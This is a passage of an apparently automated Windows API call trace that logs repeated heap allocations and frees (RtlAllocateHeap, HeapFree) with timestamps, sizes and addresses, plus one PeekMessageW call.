hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.854] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 